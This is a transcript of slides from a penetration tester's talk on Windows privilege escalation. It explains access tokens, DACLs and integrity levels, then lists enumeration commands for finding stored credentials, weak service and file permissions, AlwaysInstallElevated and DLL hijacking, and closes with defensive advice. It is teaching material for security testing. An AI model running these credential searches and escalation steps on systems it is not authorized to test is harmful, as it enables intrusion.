level up! - practical windows privilege escalation
TRANSCRIPT
![Page 1: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/1.jpg)
Practical Windows Privilege Escalation
Andrew Smith
![Page 2: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/2.jpg)
C:\>type disclaimer.txt
•The opinions expressed in this
presentation are mine and not
those of my employer.
![Page 3: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/3.jpg)
C:\>whoami /all
•Andrew Smith
•@jakx_
•Penetration Tester
•OWASP
•Metasploit
•CTF
•Certs
![Page 4: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/4.jpg)
C:\>whois you
![Page 5: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/5.jpg)
What are you talking about?
•Relevant Windows Security Info
•PrivEsc tricks win7
•Limited user -> Local Admin
![Page 6: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/6.jpg)
Why should I care?
•You wanna level up
•You wanna prevent level up
•Hack the planet!
•You like Mario?
![Page 7: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/7.jpg)
Why should I care?
•"People designing defenses who have
never had them evaluated by a good
attacker is kind of like learning one of
those martial arts that look more like
dancing than fighting. They look nice,
but when you get into a fight your
dance kungfu isn’t going to help you
not get your ass kicked."
-Dan Guido
![Page 8: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/8.jpg)
Windows Access Control
*https://msdn.microsoft.com/en-us/library/windows/desktop/aa379557%28v=vs.85%29.aspx
•Securable Objects
•Files
•Directories
•Services
•Registry Keys
•Named Pipes
![Page 9: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/9.jpg)
Windows Access Control
*https://msdn.microsoft.com/en-us/library/windows/desktop/aa379563%28v=vs.85%29.aspx
•Security Descriptor
•Discretionary Access Control List
(DACL)
•Access Control Entries (ACE)
![Page 10: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/10.jpg)
Windows Access Control
*https://msdn.microsoft.com/en-us/library/windows/desktop/aa379563%28v=vs.85%29.aspx
•Access Token
•Container of user
security info
•SID, groups,
privileges
•Tied to process or
thread
![Page 11: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/11.jpg)
Windows Access Control
![Page 12: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/12.jpg)
Windows Access Control
Access Token
![Page 13: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/13.jpg)
Windows Access Control
Access Token
DACL
![Page 14: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/14.jpg)
Windows Access Control
Access Token
DACL
AccessChk
![Page 15: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/15.jpg)
Mandatory Integrity Control
*https://msdn.microsoft.com/en-us/library/bb625963.aspx
•Security feature post-Vista
•Assigns process Integrity Levels
•Indicates “trustworthiness” of
object
![Page 16: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/16.jpg)
Windows Integrity Levels
*Windows® Internals: Including Windows Server 2008 and Windows Vista, Fifth Edition
![Page 17: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/17.jpg)
Windows Integrity Levels
Low Medium High SYSTEM
*https://msdn.microsoft.com/en-us/library/bb625963.aspx
![Page 18: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/18.jpg)
Windows Integrity Levels
*https://msdn.microsoft.com/en-us/library/bb625963.aspx
Low Medium High SYSTEM
UAC Just ask nicely…
![Page 19: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/19.jpg)
The Setup…
•Land on workstation as SKYNET\Luigi
via $method
•Want to escalate privileges
•Limited User -> Local Admin
•Marketing isnt Admin… right?
![Page 20: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/20.jpg)
Time to Level Up!
•Admin somewhere else?
•Creds in files
•Exploit unpatched EoP bugs
•Exploit insecure configs/apps
•Weak Services DACLs
•Weak File DACLs
•AlwaysInstallEvelated
•DLLs
![Page 21: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/21.jpg)
Somewhere Else?
•Luigi in “Domain Users” group
•1 box “Domain Users” in “Administrators”
![Page 22: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/22.jpg)
Somewhere Else?
•Powerview•https://github.com/PowerShellMafia/PowerSploit/blob/m
aster/Recon/PowerView.ps1
• Find-LocalAdminAccess
![Page 23: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/23.jpg)
Somewhere Else?
![Page 24: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/24.jpg)
Creds in Files
•C:\users\luigi\Desktop\passwords.xls•C:\>dir /b /s web.config
•C:\>dir /b /s unattend.xml
•C:\>dir /b /s sysprep.inf
•C:\>dir /b /s sysprep.xml
•C:\>dir /b /s *pass*
•GPP
•\\mushroomkindgom\SYSVOL\????
![Page 25: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/25.jpg)
Windows EoP Buggzz
•Enumerate missing patches•post/windows/gather/enum_patches
•post/multi/recon/local_exploit_suggester
•Pwn
![Page 26: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/26.jpg)
Windows EoP Buggzz
•MS13-053
![Page 27: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/27.jpg)
Weak Service Permissions
Accesschk.exe –qwcu “Authenticated Users” *
Accesschk.exe –qwcu “Users” *
Accesschk.exe –qwcu “Everyone” *
![Page 28: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/28.jpg)
Weak Service Permissions
•Can we edit the service config?
•Can we edit the binary it points to?
![Page 29: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/29.jpg)
Weak Service Permissions
•Demo
![Page 30: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/30.jpg)
Weak File Permissions
•Look for writeable files
•Autoruns?
•Scheduled Tasks?
Accesschk.exe –qwsu “Authenticated Users” c:\
Accesschk.exe –qwsu “Users” c:\
Accesschk.exe –qwsu “Everyone” c:\
![Page 31: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/31.jpg)
Weak File Permissions
•Story time
![Page 32: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/32.jpg)
Weak File Permissions
•Story time
•Main app binary writeable “users”
![Page 33: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/33.jpg)
Weak File Permissions
•Story time
•Main app binary writeable “users”
•Autorun on login
![Page 34: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/34.jpg)
Weak File Permissions
![Page 35: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/35.jpg)
Weak File Permissions
• “Nah bro, UAC”
![Page 36: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/36.jpg)
Weak File Permissions
• Admin logs in
![Page 37: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/37.jpg)
Weak File Permissions
• Admin logs in
• Backdoored binary auto-executes
![Page 38: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/38.jpg)
Weak File Permissions
• Admin logs in
• Backdoored binary auto-executes
• Code execution at medium IL as admin
(UAC)
![Page 39: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/39.jpg)
Weak File Permissions
•“One important thing to know is that UAC is
not a security boundary.”
*https://blogs.msdn.microsoft.com/e7/2009/02/05/update-on-uac/
![Page 40: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/40.jpg)
AlwaysInstallElevated
•Group policy setting that makes installing
packages (.msi) convenient…
•..Any .msi…
•for everyone..
![Page 41: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/41.jpg)
AlwaysInstallElevated
reg query
HKLM\SOFTWARE\Policies\Microsoft
\Windows\Installer /v
AlwaysInstallElevated
reg query
HKCU\SOFTWARE\Policies\Microsoft
\Windows\Installer /v
AlwaysInstallElevated
![Page 42: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/42.jpg)
AlwaysInstallElevated
•Demo
![Page 43: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/43.jpg)
DLL Hijacking
•Windows can dynamically load DLLs
•If full path not used/missing, Windows
executes DLL Search Order
•Eg.
•LoadLibrary(“ohnoes.dll”)
vs
•LoadLibrary(“c:\program files\ohnoes.dll”)
![Page 44: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/44.jpg)
DLL Hijacking
1. The directory from which the application
loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory.
5. The current directory.
6. The directories listed in the PATH
environment variable.
*https://msdn.microsoft.com/en-us/library/windows/desktop/ms682586%28v=vs.85%29.aspx
![Page 45: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/45.jpg)
DLL Hijacking
1. The directory from which the application
loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory.
5. The current directory. (Exploitable)
6. The directories listed in the PATH
environment variable. (Exploitable)
*https://msdn.microsoft.com/en-us/library/windows/desktop/ms682586%28v=vs.85%29.aspx
![Page 46: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/46.jpg)
DLL Hijacking
•Privileged app loads missing DLL +
controllable search path element = pwned
•Use Sysinternals Procmon
•Include “.dll”
•Include “NAME NOT FOUND”
•Include folder in path
![Page 47: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/47.jpg)
DLL Hijacking
•Demo
![Page 48: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/48.jpg)
Conclusions
•Know your network/apps
•Don’t run as admin
•UAC IS NOT A SECURITY BOUNDARY
•Patch your shit
•“Hack yourself first”
![Page 49: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/49.jpg)
Tools
•Powerup•https://github.com/PowerShellMafia/PowerSploit/blob/master/Priv
esc/PowerUp.ps1
•Windows-privesc-check•https://github.com/pentestmonkey/windows-privesc-check
•Sysinternals Suite•https://technet.microsoft.com/en-us/sysinternals/bb545021.aspx
![Page 50: Level Up! - Practical Windows Privilege Escalation](https://reader030.vdocuments.mx/reader030/viewer/2022020119/5878efa01a28abfa038b7653/html5/thumbnails/50.jpg)
References/Resources
https://www.insomniasec.com/downloads/publications/WindowsPrivEsc.ppt
https://labs.mwrinfosecurity.com/system/assets/760/original/Windows_Services_-_All_roads_lead_to_SYSTEM.pdf
https://technet.microsoft.com/en-us/sysinternals/bb545027
http://www.greyhathacker.net/?p=738
Greyhat Hacking 4th edition
Windows Internals 6th edition
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607